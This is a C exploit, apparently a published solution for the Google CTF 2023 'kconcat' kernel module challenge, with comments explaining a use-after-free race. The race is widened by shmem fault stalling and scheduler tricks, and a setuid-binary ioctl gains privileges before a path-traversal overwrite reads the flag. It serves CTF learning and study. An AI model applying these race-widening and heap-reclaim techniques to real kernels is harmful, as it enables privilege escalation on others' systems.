@pqlx
Created June 25, 2023 18:14
gctf 2023
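/*
 * Exploit sketch for the "kconcat" kernel module challenge (Google CTF 2023).
 *
 * High-level idea, as far as this code shows: a kconcat message buffer is
 * freed by the module's "moderation" ioctl while a write() into it is still
 * in flight.  The in-flight user copy is stalled by making it fault on a
 * shmem-backed page whose backing memfd is concurrently being hole-punched,
 * which widens the race window enough to reclaim the freed buffer with
 * template-name allocations and overwrite one of them with a path-traversal
 * string pointing at the flag.  Statements about the module's internals in
 * the comments below are inferred from the exploit itself.
 */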
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <string.h>
#include <pthread.h>
#include <fcntl.h>
#include <errno.h>
#include <poll.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/mount.h>
#include <stdatomic.h>
#include <sys/wait.h>
#include <sched.h>  /* cpu_set_t, sched_setaffinity, SCHED_* policies, clone */
#include <time.h>   /* clock_gettime for log_info_ts */
#define WRITE_ONCE(x, val) \
do { \
    *(volatile typeof(x) *)&(x) = (val); \
} while (0)
#define READ_ONCE(x) (*(const volatile typeof(x) *)&(x))
#define outfile (stderr)
#define LOGGING
#ifdef LOGGING
#define _do_log(prefix, fmt, ...) do { fprintf(outfile, prefix " %s: " fmt "\n", __func__, ##__VA_ARGS__);} while(0)
#define log_info(fmt, ...) _do_log("[+] ", fmt, ##__VA_ARGS__)
#define log_fail(fmt, ...) _do_log("[-] ", fmt, ##__VA_ARGS__)
#define log_error(fmt, ...) log_fail("%s (%d) - " fmt, strerror(errno), errno, ##__VA_ARGS__)
#define log_debug log_info
#else
#define _do_log(prefix, fmt, ...) //do { fprintf(outfile, prefix " %s: " fmt "\n", __func__, ##__VA_ARGS__);} while(0)
#define log_info(fmt, ...) //_do_log("[+] ", fmt, ##__VA_ARGS__)
#define log_fail(fmt, ...) //_do_log("[-] ", fmt, ##__VA_ARGS__)
#define log_error(fmt, ...) //log_fail("%s (%d) - " fmt, strerror(errno), errno, ##__VA_ARGS__)
#define log_debug log_info
#endif
#define log_info_ts(fmt, ...) \
({ \
    struct timespec __now; \
    clock_gettime(CLOCK_MONOTONIC, &__now); \
    log_info("(@ %ld.%.9ld) " fmt, __now.tv_sec, __now.tv_nsec, ##__VA_ARGS__); \
})
void hexdump(const void* data, size_t size)
{
    char ascii[17];
    size_t i, j;
    ascii[16] = '\0';
    for (i = 0; i < size; ++i) {
        printf("%02X ", ((unsigned char*)data)[i]);
        if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
            ascii[i % 16] = ((unsigned char*)data)[i];
        } else {
            ascii[i % 16] = '.';
        }
        if ((i+1) % 8 == 0 || i+1 == size) {
            printf(" ");
            if ((i+1) % 16 == 0) {
                printf("| %s \n", ascii);
            } else if (i+1 == size) {
                ascii[(i+1) % 16] = '\0';
                if ((i+1) % 16 <= 8) {
                    printf(" ");
                }
                for (j = (i+1) % 16; j < 16; ++j) {
                    printf(" ");
                }
                printf("| %s \n", ascii);
            }
        }
    }
}
int pin_cpu_for(pid_t tid, int cpu)
{
    cpu_set_t cpuset;
    CPU_ZERO(&cpuset);
    CPU_SET(cpu, &cpuset);
    if (sched_setaffinity(tid, sizeof(cpuset), &cpuset) < 0) {
        log_error("sched_setaffinity() (cpu=%d)", cpu);
        return -1;
    }
    return 0;
}
int pin_cpu(int cpu)
{
    return pin_cpu_for(0, cpu);
}
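/*
 * Scheduling helpers.  The race below is paced largely with scheduler
 * policies: threads demote themselves to SCHED_IDLE right before entering the
 * slow path they want to lose to, while the coordinating task runs at
 * SCHED_BATCH.  sched_setscheduler() is invoked through syscall() directly,
 * presumably to get the raw per-thread kernel behaviour rather than whatever
 * the libc wrapper provides.
 */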
static int sys_sched_setscheduler(pid_t pid, int policy, struct sched_param* param)
{
    return syscall(__NR_sched_setscheduler, pid, policy, param);
}
int set_sched_for(pid_t tid, int policy)
{
    struct sched_param param = {.sched_priority = 0};
    int res;
    if ((res = sys_sched_setscheduler(tid, policy, &param)) < 0)
        log_error("sched_setscheduler(%d, %d, {0})", tid, policy);
    return res;
}
void* mmap_shared_anon(size_t sz)
{
    return mmap(NULL, (sz + 0xffful) & ~0xffful, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
}
void* mmap_priv_anon(size_t sz)
{
    return mmap(NULL, (sz + 0xffful) & ~0xffful, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
}
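/*
 * Process-shared mutexes living in MAP_SHARED memory are used as one-shot
 * barriers between the parent, the clone()d child and its threads: each side
 * creates a mutex pre-locked, and the peer blocks on pthread_mutex_lock()
 * until the owner unlocks it at the right point in the sequence.
 */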
void mutex_init_shared(pthread_mutex_t* mutex, int shared_flag)
{
    pthread_mutexattr_t attr;
    pthread_mutexattr_init(&attr);
    pthread_mutexattr_setpshared(&attr, shared_flag);
    pthread_mutex_init(mutex, &attr);
}
void mutex_init_shared_andlock(pthread_mutex_t* mutex, int shared_flag)
{
    mutex_init_shared(mutex, shared_flag);
    pthread_mutex_lock(mutex);
}
extern char** environ;
__attribute__((noreturn))
static void bootstrap()
{
    /* re-exec ourselves with an argument so main() skips this branch,
     * after adjusting the terminal's output newline translation */
    char* args[] = {
        "/bin/sh",
        "-c",
        "stty ocrnl -onlcr && exec /tmp/exploit/exp 0",
        NULL
    };
    execve("/bin/sh", args, environ);
    __builtin_unreachable();
}
static int kconcat_open()
{
    int res = open("/dev/kconcat", O_RDWR);
    if (res < 0)
        log_error("open /dev/kconcat");
    return res;
}
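/*
 * Privilege trick (per the comment inside): the module seems to flag a
 * kconcat fd as privileged once a privileged process performs an ioctl on it.
 * chsh is setuid-root and probes stdin with tty ioctls, so exec'ing it with
 * the kconcat fd dup'd onto fd 0 is enough; chsh then exits because the fd is
 * not a tty, but the side effect has already happened.
 */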
static int kconcat_add_privs(int kfd)
{
    pid_t child_pid;
    if (!(child_pid = fork())) {
        char* args[] = {"/bin/chsh", NULL};
        close(0);
        dup2(kfd, 0);
        /* chsh will exit because kconcat is not a tty,
         * but any privileged ioctl gives the kconcat privs */
        execve(args[0], args, environ);
        log_error("execve() failed??");
        exit(0);
    }
    /* reap the child once it's exited */
    int status;
    if (waitpid(child_pid, &status, 0) < 0) {
        log_error("waitpid(%d, .., 0)", child_pid);
        return -1;
    }
    log_info("kconcat %d: added privs", kfd);
    return 0;
}
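/*
 * Module commands, as used by this exploit (the numbers are the module's,
 * their meaning is inferred): 0x1234 registers a template file to be pulled
 * into the output, 0x1337 runs "moderation" for a needle string, which is
 * what frees the message buffer we race against.
 */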
static int kconcat_add_template(int kfd, const char* filename)
{
    int res;
    if ((res = ioctl(kfd, 0x1234, filename)) < 0) {
        log_error("ioctl(%d, 0x1234, %s)", kfd, filename);
    } else {
        //log_info("kconcat %d: added template file \"%s\"", kfd, filename);
    }
    return res;
}
static int kconcat_do_mod(int kfd, const char* needle)
{
    int res;
    if ((res = ioctl(kfd, 0x1337, needle)) < 0) {
        log_error("ioctl(%d, 0x1337, %s)", kfd, needle);
    } else {
        log_info_ts("kconcat %d: moderation for \"%s\" completed", kfd, needle);
    }
    return res;
}
static ssize_t kconcat_read(int kfd, char* buf, size_t nbuf)
{
    ssize_t res = read(kfd, buf, nbuf);
    if (res < 0) {
        log_error("read(%d, %p, 0x%lx)", kfd, buf, nbuf);
    } else {
        log_info("kconcat %d: read 0x%lx bytes", kfd, res);
        hexdump(buf, res);
    }
    return res;
}
static ssize_t kconcat_write(int kfd, const char* buf, size_t nbuf)
{
    ssize_t res = write(kfd, buf, nbuf);
    if (res < 0) {
        log_error("write(%d, %p, 0x%lx)", kfd, buf, nbuf);
    } else {
        log_info_ts("kconcat %d: wrote 0x%lx bytes to %p", kfd, res, buf);
        //hexdump(buf, res);
    }
    return res;
}
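/*
 * Everything the racing tasks share lives in one MAP_SHARED uaf_rw block:
 * the read/write descriptor handed to the stalled thread, the memfd used to
 * back the faulting page, the hole-punch thread's state, and the clone()d
 * child that hosts the blocked threads.  All mutexes in here are
 * PTHREAD_PROCESS_SHARED so they work across the fork()/clone() boundaries.
 */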
struct uaf_rw_desc {
    bool read;
    int kfd;
    void* addr;
    size_t sz;
    /* set after finished */
    ssize_t res;
    atomic_bool done;
};
struct mm_block_task {
    pthread_mutex_t mutex;
    pid_t pid;
    void* stack;
    struct {
        pthread_t thread;
        pthread_mutex_t mutex;
    } shmem_fault_blocker;
    struct {
        pthread_t thread;
        pthread_mutex_t mutex;
        atomic_bool started;
    } uaf_fault_blocker;
};
struct hole_punch_thread {
    pthread_t thread;
    pthread_mutex_t mutex;
    atomic_bool started;
    pid_t pid;
};
struct shmem_file {
    int fd;
    atomic_size_t sz;
    void* map;
};
struct uaf_rw {
    struct uaf_rw_desc desc;
    size_t uaf_off;
    size_t uaf_size;
    size_t n_map_pages;
    void* map_base;
    uint32_t read_needle;
    pthread_mutex_t parent_mutex;
    struct shmem_file shmem_file;
    struct hole_punch_thread hole_punch_thread;
    struct mm_block_task child;
};
#define MIB_PAGES (1ul << 8)
const char* rw_desc_mode_str(const struct uaf_rw_desc* desc)
{
    return desc->read ? "read" : "write";
}
static void pollread(int fd)
{
    struct pollfd p[1] = { {.fd = fd, .events = POLLIN} };
    if (poll(p, 1, -1) < 0)
        log_error("poll({%d, POLLIN}, 1, -1)", fd);
}
static int uaf_read_create_needle_seg(struct uaf_rw* rw)
{
    /* strlen() is done before blocking, so important to have enough */
    char seg[0x200];
    memset(seg, '_', 0x200);
    snprintf(seg, sizeof seg, "%.4x", rw->read_needle);
    return kconcat_write(rw->desc.kfd, seg, rw->uaf_off + rw->uaf_size);
}
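/*
 * Race widener: the memfd is pre-filled with 64 MiB of pages, and this thread
 * (running at SCHED_IDLE) punches a hole over the whole file.  A concurrent
 * fault on the mapped shmem page has to wait for the hole punch to finish, so
 * the UAF thread's fault inside the kernel's user copy gets stuck behind it;
 * the assumption is that freeing 64 MiB of page cache at idle priority keeps
 * that window open for a long time.
 */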
static void* fallocate_holepunch_thread_fn(void* _arg)
{
    struct uaf_rw* rw = _arg;
    struct hole_punch_thread* me = &rw->hole_punch_thread;
    me->pid = getpid();
    log_info("HOLEPUNCH spawned");
    pthread_mutex_lock(&me->mutex);
    //set_sched_for(0, SCHED_BATCH);
    pthread_mutex_unlock(&rw->child.uaf_fault_blocker.mutex);
    set_sched_for(0, SCHED_IDLE);
    log_info_ts("HOLEPUNCH about to start");
    rw->hole_punch_thread.started = true;
    if (fallocate(rw->shmem_file.fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, rw->shmem_file.sz) < 0)
        log_error("falloc() hole punch failed");
    log_info_ts("HOLEPUNCH finished");
    sleep(10000);
    return NULL;
}
// static void* fallocate_blocker_thread_fn(void* _arg)
// {
// struct uaf_rw* rw = _arg;
// void* map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, rw->shmem_file.fd, 0);
// madvise(map, 0x1000, MADV_DONTNEED);
// pthread_mutex_lock(&rw->child.shmem_fault_blocker.mutex);
// set_sched_for(0, SCHED_BATCH);
// pthread_mutex_unlock(&rw->child.uaf_fault_blocker.mutex);
// set_sched_for(0, SCHED_IDLE);
// log_info_ts("HOLEBLOCK about to start");
// __asm__ __volatile__("": : :"memory");
// WRITE_ONCE(*((uint64_t*)map), 0xdeadbeef0badc0deul);
// log_info_ts("HOLEBLOCK finished");
// }
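/*
 * The stalled kernel access.  desc.addr is arranged so the buffer passed to
 * read()/write() starts on a normal anonymous page (holding the needle /
 * prefix bytes) and crosses into the shmem-backed page, which has just been
 * zapped with MADV_DONTNEED.  The module's copy to/from user space therefore
 * faults mid-copy, and that fault blocks on the concurrent hole punch --
 * leaving the kernel-side buffer exposed to whatever we can arrange from the
 * other tasks before the copy resumes.
 */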
static void* uaf_rw_thread_fn(void* _arg)
{
    struct uaf_rw* rw = _arg;
    struct uaf_rw_desc* rw_desc = &rw->desc;
    // for (size_t i = 0; i < 1000; i++)
    //     rand();
    /* explicitly fault in the page with the first stuff */
    size_t prefix_pages = rw->uaf_off ? 1 : 0;
    if (prefix_pages)
        WRITE_ONCE(*(uint64_t*)rw->map_base, 0x5555555555555555ul);
    madvise(rw->map_base + prefix_pages * 0x1000, 0x1000, MADV_DONTNEED);
    log_info_ts("UAF THREAD initialized");
    pthread_mutex_lock(&rw->child.uaf_fault_blocker.mutex);
    set_sched_for(0, SCHED_IDLE);
    pthread_mutex_unlock(&rw->parent_mutex);
    log_info_ts("UAF THREAD about to begin");
    while (!rw->hole_punch_thread.started)
        usleep(1000);
    rw->child.uaf_fault_blocker.started = true;
    if (rw_desc->read) {
        rw_desc->res = kconcat_read(rw_desc->kfd, rw_desc->addr, rw_desc->sz);
    } else {
        rw_desc->res = kconcat_write(rw_desc->kfd, rw_desc->addr, rw_desc->sz);
        hexdump(rw_desc->addr, rw_desc->sz);
    }
    rw_desc->done = true;
    log_info_ts("UAF THREAD ended");
    sleep(10000);
    return NULL;
}
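/*
 * Child entered via clone(CLONE_FILES): it shares the fd table with the
 * parent (so the kconcat fds are usable from both sides), hosts the UAF
 * thread, and performs the initial 64 MiB fallocate() that the hole punch
 * will later have to tear down page by page.  It then parks on its own
 * (already locked) mutex.
 */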
int thread_spawn_child_fn(void* _arg)
{
    struct uaf_rw* rw = _arg;
    struct mm_block_task* me = &rw->child;
    log_info("thread spawner child started");
    mutex_init_shared_andlock(&me->shmem_fault_blocker.mutex, PTHREAD_PROCESS_SHARED);
    mutex_init_shared_andlock(&me->uaf_fault_blocker.mutex, PTHREAD_PROCESS_SHARED);
    //pthread_create(&me->shmem_fault_blocker.thread, NULL, fallocate_blocker_thread_fn, rw);
    pthread_create(&me->uaf_fault_blocker.thread, NULL, uaf_rw_thread_fn, rw);
    size_t shmem_sz = (MIB_PAGES * 64) * 0x1000;
    if (fallocate(rw->shmem_file.fd, 0, 0, shmem_sz) < 0)
        log_error("falloc() initial allocation failed");
    rw->shmem_file.sz = shmem_sz;
    pthread_mutex_lock(&me->mutex);
    return 0;
}
struct uaf_rw* uaf_rw_create(size_t uaf_off, size_t uaf_size, bool is_read)
{
    static uint32_t __next_read_needle = 0;
    if (uaf_off >= 0x200) {
        log_fail("nonsensical uaf_off 0x%lx", uaf_off);
        return NULL;
    } else if (uaf_size == 0 || uaf_size >= 0x200) {
        log_fail("nonsensical uaf_size 0x%lx", uaf_size);
        return NULL;
    }
    size_t result_size = (sizeof(struct uaf_rw) + 0xfff) & ~0xfff;
    struct uaf_rw* rw = mmap_shared_anon(result_size);
    if (rw == MAP_FAILED) {
        log_error("mmap() for uaf_rw");
        return NULL;
    }
    rw->uaf_off = uaf_off;
    rw->uaf_size = uaf_size;
    size_t prefix_pages = rw->uaf_off ? 1 : 0;
    rw->n_map_pages = prefix_pages + 1;
    rw->shmem_file.fd = memfd_create("uaf", 0);
    rw->shmem_file.sz = 0;
    if (fcntl(rw->shmem_file.fd, F_SETFL, O_DIRECT) < 0)
        log_error("fcntl");
    if ((rw->map_base = mmap_shared_anon(rw->n_map_pages * 0x1000)) == MAP_FAILED) {
        log_error("mmap() failed for uaf_rw");
        munmap(rw, result_size);
        return NULL;
    } else if (mmap(rw->map_base + prefix_pages * 0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_SHARED, rw->shmem_file.fd, 0) !=
               rw->map_base + prefix_pages * 0x1000) {
        log_error("mmap() for shmem page");
        munmap(rw->map_base, rw->n_map_pages * 0x1000);
        munmap(rw, result_size);
        return NULL;
    }
    rw->desc.addr = (rw->map_base + (prefix_pages * 0x1000)) - rw->uaf_off;
    rw->desc.sz = rw->uaf_off + rw->uaf_size;
    rw->desc.kfd = kconcat_open();
    if ((rw->desc.read = is_read)) {
        rw->read_needle = __next_read_needle++;
        uaf_read_create_needle_seg(rw);
    }
    if ((rw->child.stack = mmap_shared_anon(16 * 0x1000)) == MAP_FAILED)
        log_error("mmap for child stack");
    mutex_init_shared_andlock(&rw->child.mutex, PTHREAD_PROCESS_SHARED);
    mutex_init_shared_andlock(&rw->parent_mutex, PTHREAD_PROCESS_SHARED);
    mutex_init_shared_andlock(&rw->hole_punch_thread.mutex, PTHREAD_PROCESS_SHARED);
    pthread_create(&rw->hole_punch_thread.thread, NULL, fallocate_holepunch_thread_fn, rw);
    clone(thread_spawn_child_fn, rw->child.stack + 16 * 0x1000 - 0x10, CLONE_FILES, rw);
    while (!rw->shmem_file.sz)
        usleep(50000);
    return rw;
}
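/*
 * Kicking off the race: unlock the hole-punch thread, wait on parent_mutex
 * until the UAF thread has dropped to SCHED_IDLE, then spin until it signals
 * that it is about to issue the racy read()/write().  Once this returns, the
 * kernel-side copy should (with luck) be stalled on the shmem page fault.
 */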
static void uaf_rw_activate(struct uaf_rw* rw)
{
    set_sched_for(0, SCHED_BATCH);
    log_info_ts("PARENT activate");
    pthread_mutex_unlock(&rw->hole_punch_thread.mutex);
    //set_sched_for(0, SCHED_OTHER);
    pthread_mutex_lock(&rw->parent_mutex);
    while (!rw->child.uaf_fault_blocker.started)
        usleep(1000);
    //set_sched_for(rw->hole_punch_thread.pid, SCHED_IDLE)
    //set_sched_for(0, SCHED_BATCH);
    log_info_ts("PARENT woke up");
}
static void uaf_write_set_uafdata(struct uaf_rw* rw, const void* uaf_data)
{
    memcpy(rw->desc.addr + rw->uaf_off, uaf_data, rw->uaf_size);
}
static void uaf_write_set_needle(struct uaf_rw* rw, const void* needle)
{
    memcpy(rw->desc.addr, needle, rw->uaf_off);
}
// module_close 0xffffffffc0000000, module_open 0xffffffffc0000080
// module_ioctl 0xffffffffc00005e0, module_read 0xffffffffc00002a0
// module_write 0xffffffffc0000470
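/*
 * Exploit flow in main() (write primitive with uaf_off=16, uaf_size=128):
 *   1. gain "privs" on a moderator fd via the chsh trick,
 *   2. set up the stalled kconcat write whose first 16 bytes are the needle
 *      "XAXAXAXAXAXAXAXA",
 *   3. trigger moderation on that needle, which presumably frees the message
 *      buffer the stalled write is still targeting,
 *   4. place the path-traversal payload in the user pages and spray template
 *      registrations from 12 other fds to reclaim the freed allocation,
 *   5. once the stalled write lands, it overwrites a template path with
 *      "sage-templates/../../../../flag"; reading those fds (after granting
 *      them privs too) should then dump the flag.
 * Steps 3-5 describe the intended effect as inferred from the code.
 */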
int main(int argc, char** argv)
{
    if (argc <= 1) {
        bootstrap();
        return -1;
    }
    struct rlimit nofile = {};
    getrlimit(RLIMIT_NOFILE, &nofile);
    nofile.rlim_cur = nofile.rlim_max;
    setrlimit(RLIMIT_NOFILE, &nofile);
    int mod_kfd = kconcat_open();
    if (kconcat_add_privs(mod_kfd) < 0)
        return -1;
    struct uaf_rw* uaf_writer = uaf_rw_create(16, 128, false);
    if (!uaf_writer)
        return -1;
    log_info("created uaf writer");
    int sprayer_kfds[12];
    char fillbuf[510];
    memset(fillbuf, 'A', sizeof fillbuf);
    for (size_t i = 0; i < 12; i++) {
        sprayer_kfds[i] = kconcat_open();
        kconcat_write(sprayer_kfds[i], fillbuf, sizeof fillbuf);
    }
    char to_write[256];
    memset(to_write, 0, sizeof to_write);
    uaf_write_set_needle(uaf_writer, "XAXAXAXAXAXAXAXA");
    strcpy(to_write, "sage-templates/../../../../flag");
    if (!fork()) {
        uaf_rw_activate(uaf_writer);
        kconcat_do_mod(mod_kfd, "XAXAXAXAXAXAXAXA");
        uaf_write_set_uafdata(uaf_writer, to_write);
        for (size_t i = 0; i < 12; i++) {
            for (size_t ii = 0; ii < 4; ii++)
                kconcat_add_template(sprayer_kfds[i], "nopwning");
        }
        log_info_ts("added templates");
        while (!uaf_writer->desc.done)
            usleep(1000);
        char buf[0x1000];
        for (size_t i = 0; i < 12; i++) {
            kconcat_add_privs(sprayer_kfds[i]);
            kconcat_read(sprayer_kfds[i], buf, 0x1000);
        }
    }
    sleep(10000);
    return 0;
}